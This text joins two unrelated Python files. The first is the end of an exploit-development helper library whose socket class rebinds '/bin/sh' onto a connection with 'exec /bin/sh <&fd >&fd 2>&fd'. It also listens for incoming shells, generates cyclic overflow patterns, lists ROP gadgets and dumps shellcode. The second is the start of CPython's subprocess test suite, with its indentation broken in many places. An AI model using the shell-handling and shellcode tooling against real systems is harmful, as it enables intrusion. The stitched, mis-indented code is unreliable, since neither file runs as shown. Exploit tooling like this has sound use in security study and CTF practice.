            buf += chunk
        if self.display:
            printable = re.sub(r'[^\s\x20-\x7e]', '.', buf)
            sys.stdout.write("\x1b[36m%s\x1b[0m" % printable)  # cyan
            sys.stdout.flush()
        return buf
    def read_until(self, s):
        """Block (no timeout) until the received data ends with `s`."""
        buf = self.read(len(s), None)
        while not buf.endswith(s):
            buf += self.read(1, None)
        return buf
    def expect(self, regexp):
        """Block until `regexp` matches the accumulated input; return the match."""
        buf = ''
        m = None
        while not m:
            buf += self.read(1, None)
            m = re.search(regexp, buf)
        return m
    def readline(self):
        return self.read_until('\n')
    def writeline(self, s):
        return self.write(s+'\n')
    def shutdown(self, writeonly=False):
        """Half-close (write side only) or fully shut down the socket."""
        if writeonly:
            self.s.shutdown(socket.SHUT_WR)
        else:
            self.s.shutdown(socket.SHUT_RDWR)
    def close(self):
        self.s.close()
    def interact(self, shell_fd=None):
        """Hand the connection over to an interactive telnet session;
        with shell_fd, first re-exec /bin/sh bound to that descriptor."""
        check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"'  # green
        buf = self.read()
        sys.stdout.write(buf)
        if shell_fd is not None:
            self.write(check_cmd + '\n')
            sys.stdout.write(self.read())
            self.write("exec /bin/sh <&%(fd)d >&%(fd)d 2>&%(fd)d\n" % {'fd': shell_fd})
        t = Telnet()
        t.sock = self.s
        t.interact()
        self.shutdown()
        self.close()
    @contextmanager
    def listen(self, port=0, is_shell=False):
        """Context manager: listen on `port`, yield the bound sockname,
        then accept one connection and go interactive on it."""
        check_cmd = 'echo "\x1b[32mgot a shell!\x1b[0m"'  # green
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(('', port))
        s.listen(1)
        yield s.getsockname()
        c, addr = s.accept()
        s.close()
        if is_shell:
            c.sendall(check_cmd + '\n')
            sys.stdout.write(c.recv(8192))
        t = Telnet()
        t.sock = c
        t.interact()
        c.close()
    def pipe_output(self, *args):
        """Run `args` as a command with our socket as its stdin; return stdout."""
        p = Popen(args, stdin=self.s, stdout=PIPE)
        stdout, stderr = p.communicate()
        return stdout
    def read_p64(self):
        # NOTE(review): p64 here appears to also *unpack* the 8 bytes
        # just read (it packs elsewhere) -- verify p64 handles str input.
        return p64(self.read(8, None))
    def read_p32(self):
        # NOTE(review): same unpack-via-p32 assumption as read_p64.
        return p32(self.read(4, None))
    def write_p64(self, s):
        return self.write(p64(s))
    def write_p32(self, s):
        return self.write(p32(s))
class Pattern(object):
    """Metasploit-style cyclic pattern (pattern_create / pattern_offset)."""
    @classmethod
    def generate(cls):
        """Yield the unique triplets 'Aa0', 'Aa1', ..., 'Zz9'
        (26*26*10 = 6760 of them, 20280 characters total)."""
        # range() iterates identically on Python 2 (was xrange()).
        for x in range(0x41, 0x5b):
            for y in range(0x61, 0x7b):
                for z in range(0x30, 0x3a):
                    yield "%c%c%c" % (x, y, z)
    @classmethod
    def create(cls, size):
        """Return the first `size` characters of the pattern.

        Raises Exception when `size` exceeds the pattern length.
        """
        chunks = []
        total = 0
        # Collect triplets and join once (the old += loop was quadratic).
        for triplet in cls.generate():
            chunks.append(triplet)
            total += len(triplet)
            if total >= size:
                return ''.join(chunks)[:size]
        raise Exception("size too large")
    @classmethod
    def offset(cls, s):
        """Return the offset of `s` within the pattern.

        `s` is either a '0x...' address (its little-endian byte string is
        searched) or a literal substring of the pattern.
        """
        if s.startswith('0x'):
            addr = int16(s)
            # Addresses above 32 bits are packed as 64-bit values.
            if addr >> 32:
                chunk = p64(addr)
            else:
                chunk = p32(addr)
        else:
            chunk = s
        buf = ''
        for x in cls.generate():
            buf += x
            try:
                return buf.index(chunk)
            except ValueError:
                pass
        else:
            raise Exception("pattern not found")
class Asm(object):
    """Thin wrapper around binutils `as` and `objdump` for assembling and
    disassembling i386 / x86-64 / arm / thumb code."""
    # Per-architecture command lines; 'as' ends with -o so the output
    # file name is appended by the caller.
    cmd = {
        'i386': {
            'as': ['as', '--32', '--msyntax=intel', '--mnaked-reg', '-o'],
            'objdump': ['objdump', '-M', 'intel', '-d'],
            'objdump_binary': ['objdump', '-b', 'binary', '-m', 'i386', '-M', 'intel,i386', '-D'],
        },
        'x86-64': {
            'as': ['as', '--64', '--msyntax=intel', '--mnaked-reg', '-o'],
            'objdump': ['objdump', '-M', 'intel', '-d'],
            'objdump_binary': ['objdump', '-b', 'binary', '-m', 'i386', '-M', 'intel,x86-64', '-D'],
        },
        'arm': {
            'as': ['as', '-o'],
            'objdump': ['objdump', '-d'],
            'objdump_binary': ['objdump', '-b', 'binary', '-m', 'arm', '-D'],
        },
        'thumb': {
            'as': ['as', '-mthumb', '-o'],
            'objdump': ['objdump', '-M', 'force-thumb', '-d'],
            'objdump_binary': ['objdump', '-b', 'binary', '-m', 'arm', '-M', 'force-thumb', '-D'],
        },
    }
    @classmethod
    def assemble(cls, s, arch):
        """Assemble source `s` for `arch` and return its objdump listing
        (or the assembler's stderr text on failure)."""
        if arch in cls.cmd:
            cmd = cls.cmd[arch]
        else:
            raise Exception("unsupported architecture: %r" % arch)
        with tempfile.NamedTemporaryFile(delete=False) as f:
            p = Popen(cmd['as'] + [f.name], stdin=PIPE, stdout=PIPE, stderr=PIPE)
            stdout, stderr = p.communicate(s+'\n')
            if stderr:
                return stderr
            p = Popen(cmd['objdump'] + ['-w', f.name], stdout=PIPE)
            stdout, stderr = p.communicate()
            # Drop objdump's 7-line file header.
            result = ''.join(stdout.splitlines(True)[7:])
            os.remove(f.name)
            return result
    @classmethod
    def disassemble(cls, blob, arch):
        """Disassemble raw bytes `blob` for `arch` via objdump -b binary."""
        if arch in cls.cmd:
            cmd = cls.cmd[arch]
        else:
            raise Exception("unsupported architecture: %r" % arch)
        with tempfile.NamedTemporaryFile() as f:
            f.write(blob)
            f.flush()
            if arch in ('arm', 'thumb'):
                # Treat the blob as big-endian for ARM targets.
                p = Popen(cmd['objdump_binary'] + ['-EB', '-w', f.name], stdout=PIPE)
            else:
                p = Popen(cmd['objdump_binary'] + ['-w', f.name], stdout=PIPE)
            stdout, stderr = p.communicate()
            # Drop objdump's 7-line file header.
            result = ''.join(stdout.splitlines(True)[7:])
            return result
def exit_with_usage(format_str):
    """Print a usage message (with argv[0] substituted) to stderr and
    exit with status 1.  Python 2 `print >>` syntax."""
    print >>sys.stderr, format_str % sys.argv[0]
    sys.exit(1)
# Command-line front end: dispatch on the first argument to the various
# helpers (security check, pattern create/offset, gadget listing, binary
# scanning, shellcode dumping, assembling/disassembling).  Python 2
# print statements throughout.
if __name__ == '__main__':
    if len(sys.argv) < 2:
        exit_with_usage("Usage: python %s [checksec|pc|po|gadget|scan|sc|asm|objdump] ...")
    cmd = sys.argv[1]
    if cmd == 'checksec':
        if len(sys.argv) < 3:
            exit_with_usage("check security features\n\nUsage: python %s checksec FILE")
        fpath = sys.argv[2]
        ELF(fpath).checksec()
    elif cmd == 'pc':
        if len(sys.argv) < 3:
            exit_with_usage("create Metasploit pattern\n\nUsage: python %s pc SIZE")
        size = int(sys.argv[2])
        print Pattern.create(size)
    elif cmd == 'po':
        if len(sys.argv) < 3:
            exit_with_usage("calculate offset in Metasploit pattern\n\nUsage: python %s po <ADDRESS|STRING>")
        print Pattern.offset(sys.argv[2])
    elif cmd == 'gadget':
        if len(sys.argv) < 3:
            exit_with_usage("check availability of tiny gadgets\n\nUsage: python %s gadget FILE")
        fpath = sys.argv[2]
        ROP(fpath).list_gadgets()
    elif cmd == 'scan':
        if len(sys.argv) < 4:
            exit_with_usage("grep the binary and disassemble from each index\n\nUsage: python %s scan REGEXP FILE")
        regexp = sys.argv[2]
        fpath = sys.argv[3]
        ROP(fpath).scan_gadgets(regexp)
    elif cmd == 'sc':
        if len(sys.argv) < 3:
            exit_with_usage("output shellcode as hexstring\n\nUsage: python %s sc ARCH/NAME [ARG...]")
        # "ARCH/NAME" selects a Shellcode method; remaining argv entries
        # become its arguments (digit strings converted to int).
        arch, name = sys.argv[2].split('/', 1)
        args = [int(x) if x.isdigit() else x for x in sys.argv[3:]]
        s = getattr(Shellcode(arch), name).__call__(*args)
        print ''.join("\\x%02x" % ord(x) for x in s)
    elif cmd == 'asm':
        if len(sys.argv) < 3:
            exit_with_usage("assemble/disassemble input (i386/x86-64/arm/thumb2)\n\nUsage: python %s asm [-d] ARCH")
        if sys.argv[2] == '-d' and len(sys.argv) > 3:
            arch = sys.argv[3]
            data = sys.stdin.read()
            # Hex-looking input is decoded to raw bytes first.
            if re.search(r'^[\s\dA-Fa-f]*$', data):
                data = ''.join(data.split()).decode('hex')
            print Asm.disassemble(data, arch).rstrip()
        else:
            arch = sys.argv[2]
            data = sys.stdin.read()
            print Asm.assemble(data, arch).rstrip()
    elif cmd == 'objdump':
        if len(sys.argv) < 3:
            exit_with_usage("disassemble with IDA-like annotations\n\nUsage: python %s objdump FILE")
        fpath = sys.argv[2]
        ELF(fpath).objdump()
    else:
        exit_with_usage("Usage: python %s [checksec|pc|po|gadget|scan|sc|asm|objdump] ...")
|
test_subprocess.py | import unittest
from unittest import mock
from test import support
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
from test.support import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
# This module spawns many short-lived children; that is not useful
# training data for profile-guided optimization builds.
if support.PGO:
    raise unittest.SkipTest("test is not helpful for PGO")

mswindows = (sys.platform == "win32")

#
# Depends on the following external programs: Python
#

if mswindows:
    # Prelude for child scripts: put stdout into binary mode on Windows
    # so tests observe untranslated bytes.
    SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
                 'os.O_BINARY);')
else:
    SETBINARY = ''

NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)

# Cheapest command that exits with status 0; setUpModule() may replace
# it with /bin/true, which is faster than a Python startup.
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
    """Replace ZERO_RETURN_CMD with the system `true` binary when it is
    present and actually works (faster than starting Python)."""
    true_path = shutil.which('true')
    if true_path is None:
        return
    if os.access(true_path, os.X_OK) and subprocess.run([true_path]).returncode == 0:
        global ZERO_RETURN_CMD
        ZERO_RETURN_CMD = (true_path,)  # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
    """Shared setup/teardown that keeps child processes from leaking
    between tests."""
    def setUp(self):
        # Try to minimize the number of children we have so this test
        # doesn't crash on some buildbots (Alphas in particular).
        support.reap_children()
    def tearDown(self):
        if not mswindows:
            # subprocess._active is not used on Windows and is set to None.
            # Wait out any leftover children so _cleanup() can retire them.
            for inst in subprocess._active:
                inst.wait()
            subprocess._cleanup()
            self.assertFalse(
                subprocess._active, "subprocess._active not empty"
            )
        self.doCleanups()
        support.reap_children()
class PopenTestException(Exception):
    """Deliberately raised by the _execute_child override below to test
    failure cleanup paths."""
class PopenExecuteChildRaises(subprocess.Popen):
    """Popen subclass whose child-spawning step always fails.

    Used to test cleanup of subprocess.PIPE filehandles when
    _execute_child fails.
    """
    def _execute_child(self, *args, **kwargs):
        raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
    # Without an explicit bufsize, all three pipes must be buffered.
    proc = subprocess.Popen(ZERO_RETURN_CMD,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    try:
        for stream in (proc.stdin, proc.stdout, proc.stderr):
            self.assertIsInstance(stream, io.BufferedIOBase)
    finally:
        for stream in (proc.stdin, proc.stdout, proc.stderr):
            stream.close()
        proc.wait()
def test_io_unbuffered_works(self):
    # bufsize=0 must yield raw (unbuffered) pipe objects.
    proc = subprocess.Popen(ZERO_RETURN_CMD,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, bufsize=0)
    try:
        for stream in (proc.stdin, proc.stdout, proc.stderr):
            self.assertIsInstance(stream, io.RawIOBase)
    finally:
        for stream in (proc.stdin, proc.stdout, proc.stderr):
            stream.close()
        proc.wait()
def test_call_seq(self):
    # call() accepts a sequence argv and returns the child's exit status.
    exit_code = subprocess.call(
        [sys.executable, "-c", "import sys; sys.exit(47)"])
    self.assertEqual(exit_code, 47)
def test_call_timeout(self):
    # call() waits for the child, so if the timeout failed to kill it
    # this test would deadlock instead of raising TimeoutExpired.
    with self.assertRaises(subprocess.TimeoutExpired):
        subprocess.call([sys.executable, "-c", "while True: pass"],
                        timeout=0.1)
def test_check_call_zero(self):
    # check_call() returns 0 when the child exits successfully.
    self.assertEqual(subprocess.check_call(ZERO_RETURN_CMD), 0)
def test_check_call_nonzero(self):
    # A non-zero exit status surfaces as CalledProcessError carrying it.
    with self.assertRaises(subprocess.CalledProcessError) as ctx:
        subprocess.check_call(
            [sys.executable, "-c", "import sys; sys.exit(47)"])
    self.assertEqual(ctx.exception.returncode, 47)
def test_check_output(self):
    # check_output() captures the child's stdout on success.
    captured = subprocess.check_output(
        [sys.executable, "-c", "print('BDFL')"])
    self.assertIn(b'BDFL', captured)
def test_check_output_nonzero(self):
    """check_output() raises CalledProcessError on a non-zero exit."""
    cmd = [sys.executable, "-c", "import sys; sys.exit(5)"]
    with self.assertRaises(subprocess.CalledProcessError) as ctx:
        subprocess.check_output(cmd)
    self.assertEqual(ctx.exception.returncode, 5)
def test_check_output_stderr(self):
    """stderr=STDOUT folds the child's stderr into the captured output."""
    captured = subprocess.check_output(
        [sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
        stderr=subprocess.STDOUT)
    self.assertIn(b'BDFL', captured)
def test_check_output_stdin_arg(self):
    """check_output() accepts an open file object as stdin."""
    src = tempfile.TemporaryFile()
    self.addCleanup(src.close)
    src.write(b'pear')
    src.seek(0)
    result = subprocess.check_output(
        [sys.executable, "-c",
         "import sys; sys.stdout.write(sys.stdin.read().upper())"],
        stdin=src)
    self.assertIn(b'PEAR', result)
def test_check_output_input_arg(self):
    """check_output(input=...) feeds the given bytes to the child's stdin."""
    upper_cmd = [sys.executable, "-c",
                 "import sys; sys.stdout.write(sys.stdin.read().upper())"]
    result = subprocess.check_output(upper_cmd, input=b'pear')
    self.assertIn(b'PEAR', result)
def test_check_output_input_none(self):
    """input=None has a legacy meaning of input='' on check_output."""
    # The child sees an immediately-closed stdin, so read() returns ''.
    output = subprocess.check_output(
            [sys.executable, "-c",
             "import sys; print('XX' if sys.stdin.read() else '')"],
            input=None)
    self.assertNotIn(b'XX', output)
def test_check_output_input_none_text(self):
    """input=None behaves like empty input also in text mode."""
    output = subprocess.check_output(
            [sys.executable, "-c",
             "import sys; print('XX' if sys.stdin.read() else '')"],
            input=None, text=True)
    self.assertNotIn('XX', output)
def test_check_output_input_none_universal_newlines(self):
    """input=None behaves like empty input with universal_newlines=True."""
    output = subprocess.check_output(
            [sys.executable, "-c",
             "import sys; print('XX' if sys.stdin.read() else '')"],
            input=None, universal_newlines=True)
    self.assertNotIn('XX', output)
def test_check_output_stdout_arg(self):
    """check_output() refuses to accept a 'stdout' argument."""
    with self.assertRaises(ValueError) as c:
        output = subprocess.check_output(
                [sys.executable, "-c", "print('will not be run')"],
                stdout=sys.stdout)
        # Only reached if the expected ValueError was not raised.
        self.fail("Expected ValueError when stdout arg supplied.")
    self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
    """check_output() refuses to accept 'stdin' together with 'input'."""
    tf = tempfile.TemporaryFile()
    self.addCleanup(tf.close)
    tf.write(b'pear')
    tf.seek(0)
    with self.assertRaises(ValueError) as c:
        output = subprocess.check_output(
                [sys.executable, "-c", "print('will not be run')"],
                stdin=tf, input=b'hare')
        # Only reached if the expected ValueError was not raised.
        self.fail("Expected ValueError when stdin and input args supplied.")
    # The error message should mention both conflicting arguments.
    self.assertIn('stdin', c.exception.args[0])
    self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
    """check_output(timeout=...) raises and preserves the partial output."""
    with self.assertRaises(subprocess.TimeoutExpired) as c:
        output = subprocess.check_output(
                [sys.executable, "-c",
                 "import sys, time\n"
                 "sys.stdout.write('BDFL')\n"
                 "sys.stdout.flush()\n"
                 "time.sleep(3600)"],
                # Some heavily loaded buildbots (sparc Debian 3.x) require
                # this much time to start and print.
                timeout=3)
        self.fail("Expected TimeoutExpired.")
    # Output produced before the timeout is attached to the exception.
    self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
    """call() forwards keyword args (here env=) to the child process."""
    newenv = os.environ.copy()
    newenv["FRUIT"] = "banana"
    rc = subprocess.call([sys.executable, "-c",
                          'import sys, os;'
                          'sys.exit(os.getenv("FRUIT")=="banana")'],
                         env=newenv)
    # sys.exit(True) maps to exit status 1, proving the env var was seen.
    self.assertEqual(rc, 1)
def test_invalid_args(self):
    """Popen() with invalid arguments raises TypeError without noise."""
    # Popen() called with invalid arguments should raise TypeError
    # but Popen.__del__ should not complain (issue #12085)
    with support.captured_stderr() as s:
        self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
        # One more positional argument than __init__ accepts.
        argcount = subprocess.Popen.__init__.__code__.co_argcount
        too_many_args = [0] * (argcount + 1)
        self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
    # Nothing should have been written to stderr during finalization.
    self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
    """Popen.stdin stays None when stdin is not redirected."""
    proc = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    self.addCleanup(proc.stdout.close)
    self.addCleanup(proc.stderr.close)
    proc.wait()
    self.assertEqual(proc.stdin, None)
def test_stdout_none(self):
    """Popen.stdout stays None and the child inherits the parent's stdout."""
    # .stdout is None when not redirected, and the child's stdout will
    # be inherited from the parent.  In order to test this we run a
    # subprocess in a subprocess:
    # this_test
    #   \-- subprocess created by this test (parent)
    #          \-- subprocess created by the parent subprocess (child)
    # The parent doesn't specify stdout, so the child will use the
    # parent's stdout.  This test checks that the message printed by the
    # child goes to the parent stdout.  The parent also checks that the
    # child's stdout is None.  See #11963.
    code = ('import sys; from subprocess import Popen, PIPE;'
            'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
            '          stdin=PIPE, stderr=PIPE);'
            'p.wait(); assert p.stdout is None;')
    p = subprocess.Popen([sys.executable, "-c", code],
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    out, err = p.communicate()
    self.assertEqual(p.returncode, 0, err)
    self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
    """Popen.stderr stays None when stderr is not redirected."""
    proc = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    self.addCleanup(proc.stdout.close)
    self.addCleanup(proc.stdin.close)
    proc.wait()
    self.assertEqual(proc.stderr, None)
def _assert_python(self, pre_args, **kwargs):
    """Helper: run Python via Popen and assert it exits with status 47.

    We include sys.exit() to prevent the test runner from hanging
    whenever python is found.
    """
    args = pre_args + ["import sys; sys.exit(47)"]
    p = subprocess.Popen(args, **kwargs)
    p.wait()
    self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
    """Return (python_dir, python_base) for the resolved interpreter path."""
    return os.path.split(os.path.realpath(sys.executable))
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
    """Helper: assert the child runs and its cwd equals *expected_cwd*.

    Invoke Python via Popen, and assert that (1) the call succeeds,
    and that (2) the current working directory of the child process
    matches *expected_cwd*.
    """
    p = subprocess.Popen([python_arg, "-c",
                          "import os, sys; "
                          "buf = sys.stdout.buffer; "
                          "buf.write(os.getcwd().encode()); "
                          "buf.flush(); "
                          "sys.exit(47)"],
                         stdout=subprocess.PIPE,
                         **kwargs)
    self.addCleanup(p.stdout.close)
    p.wait()
    self.assertEqual(47, p.returncode)
    # Compare case-insensitively where the platform requires it.
    normcase = os.path.normcase
    self.assertEqual(normcase(expected_cwd),
                     normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
    """Bytes written to a PIPE stdin reach the child process."""
    child = subprocess.Popen(
        [sys.executable, "-c",
         'import sys; sys.exit(sys.stdin.read() == "pear")'],
        stdin=subprocess.PIPE)
    child.stdin.write(b"pear")
    child.stdin.close()
    child.wait()
    # sys.exit(True) maps to exit status 1.
    self.assertEqual(child.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
    """stdout=PIPE captures exactly what the child writes to stdout."""
    child = subprocess.Popen(
        [sys.executable, "-c", 'import sys; sys.stdout.write("orange")'],
        stdout=subprocess.PIPE)
    with child:
        self.assertEqual(child.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
    """stderr=PIPE captures exactly what the child writes to stderr."""
    child = subprocess.Popen(
        [sys.executable, "-c", 'import sys; sys.stderr.write("strawberry")'],
        stderr=subprocess.PIPE)
    with child:
        self.assertEqual(child.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
